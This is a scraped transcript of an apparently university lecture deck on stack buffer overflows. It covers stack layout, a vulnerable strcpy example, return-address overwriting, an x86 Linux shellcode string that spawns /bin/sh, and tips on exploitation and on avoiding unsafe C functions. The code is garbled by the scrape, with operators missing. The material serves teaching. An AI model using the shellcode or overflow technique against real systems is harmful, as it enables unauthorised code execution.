Smashing the Stack - PowerPoint PPT Presentation

About This Presentation
Title:

Smashing the Stack

Description:

Smashing the Stack Overview The Stack Region Buffer Overflow Shell Program Notes Avoiding Buffer Overflows Conclusion Overview smash the stack Corrupting the ... – PowerPoint PPT presentation

Number of Views:94
Avg rating:3.0/5.0
Slides: 11
Provided by: Eart60
Learn more at: http://www.cs.sjsu.edu
Category:
Tags: smashing | stack

less

Transcript and Presenter's Notes

Title: Smashing the Stack


1
Smashing the Stack
  • Overview
  • The Stack Region
  • Buffer Overflow
  • Shell Program
  • Notes
  • Avoiding Buffer Overflows
  • Conclusion

2
Overview
  • smash the stack
  • Corrupting the execution by writing past the end
    of an
  • array declared in a routine.
  • Can cause return from the routine to jump to a
    random
  • address.
  • Processes are divided into three regions stack,
    data
  • and text.



3
The Stack Region
Lower Addresses
  • Contiguous block of memory
    containing data.
  • Stack Pointer (SP) points to the top of the
    stack.
  • Frame Pointer (FP) points to a fixed location
    within a frame.
  • The stack grows down towards the lower memory
    addresses.

Frame
Higher Addresses
4
Buffer Overflow
!
  • void function(char str)
  • char buffer16
  • strcpy(buffer,str)
  • void main()
  • char large_string256
  • int i
  • for( i 0 i lt 255 i)
  • large_stringi 'A'
  • function(large_string)
  • strcpy() copies the supplied string over the
    smaller buffer in stack without bound checking.
  • 240 bytes from the end buffer are overwritten.
  • The program will most likely cause segmentation
    Fault.

segmentation fault


buffer sfp ret str
So Buffer overflow allows us to change the
return address of a function.
AAAAAAAAAAAAAA
5
Buffer Overflow
!
  • void function(int a, int b,int c)
  • char buffer15
  • char buffer210
  • int ret
  • ret buffer1 12
  • (ret) 8
  • void main()
  • int x
  • x 0
  • function(1,2,3)
  • x 1
  • printf("d\n",x)

0x8000490 ltmaingt pushl ebp 0x8000491 ltmain1gt
movl esp,ebp 0x8000493 ltmain3gt subl
0x4,esp 0x8000496 ltmain6gt movl
0x0,0xfffffffc(ebp) 0x800049d ltmain13gt pushl
0x3 0x800049f ltmain15gt pushl 0x2 0x80004a1
ltmain17gt pushl 0x1 0x80004a3 ltmain19gt call
0x8000470 ltfunctiongt 0x80004a8 ltmain24gt addl
0xc,esp 0x80004ab ltmain27gt movl
0x1,0xfffffffc(ebp) 0x80004b2 ltmain34gt movl
0xfffffffc(ebp),eax 0x80004b5 ltmain37gt pushl
eax 0x80004b6 ltmain38gt pushl 0x80004f8
0x80004bb ltmain43gt call 0x8000378 ltprintfgt
0x80004c0 ltmain48gt addl 0x8,esp 0x80004c3
ltmain51gt movl ebp,esp 0x80004c5 ltmain53gt
popl ebp 0x80004c6 ltmain54gt ret 0x80004c7
ltmain55gt nop
6
Shell Program
  • include ltstdio.hgt
  • void main()
  • char name2
  • name0 "/bin/sh"
  • name1 NULL
  • execve(name0, name, NULL)

Suggesting
SSSSSSSSSSSSS
but where in the memory space?...
JJSSSSSCCsssss
  • JMP CALL instructions can use IP relative
    addressingso we dont have to know the exact
    address of where in the memory we want to jump.

7
Shell Program
  • include ltstdio.hgt
  • void main()
  • char name2
  • name0 "/bin/sh"
  • name1 NULL
  • execve(name0, name, NULL)

but our code is modifying itself and since the
code or instructions are in read-only section of
memory, the OS will not allow this technique. so
we set the code in hex format as global variable.
char shellcode "\xeb\x2a\x5e\x89\x76\x08\xc6\x
46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\
x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00
\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\
xc3" void main() int ret ret (int
)ret 2 (ret) (int)shellcode
8
Notes
  • Different architecture have different method of
    running and managing a program. For example,
    some architectures like that of SPARC keep a good
    chunk of data on registers and once in a while
    flush to stack. Things might be well different
    on x86, powerPC, etc.
  • In these examples, Intel based LINUX was used.
  • For special cases where the whole buffer and
    stack memory are much smaller than the code to
    overwrite, we can get aid from environment
    variables.
  • Use assembly NOP instruction when necessary.
  • To overflow, be careful to avoid null pointers
    in your program, which is meant to overwrite a
    buffer. Many C functions are sensitive to null
    pointers and will stop!

9
Avoiding Buffer Overflows
  • As stated earlier, buffer overflows are the
    result of stuffing more information into a buffer
    than it is meant to hold.
  • The standard C library provides a number of
    functions for copying or appending strings, that
    perform no boundary checking. They include
    strcat(), strcpy(), sprintf(), and vsprintf().
    These functions operate on null-terminated
    strings, and do not check for overflow of the
    receiving string.
  • Another usual programming construct we find is
    the use of a while loop to read one character at
    a time into a buffer from stdin or some file
    until the end of line, end of file, or some other
    delimiter is reached. This type of construct
    usually uses one of these functions getc(),
    fgetc(), or getchar(). If there is no explicit
    checks for overflows in the while loop, such
    programs are easily exploited.

10
Conclusion
To conclude, grep(1) is your friend. The sources
for free operating systems and their utilities is
readily available. This fact becomes quite
interesting once you realize that many commercial
operating systems utilities where derived from
the same sources as the free ones (LINUX)!
Write a Comment
User Comments (0)
About PowerShow.com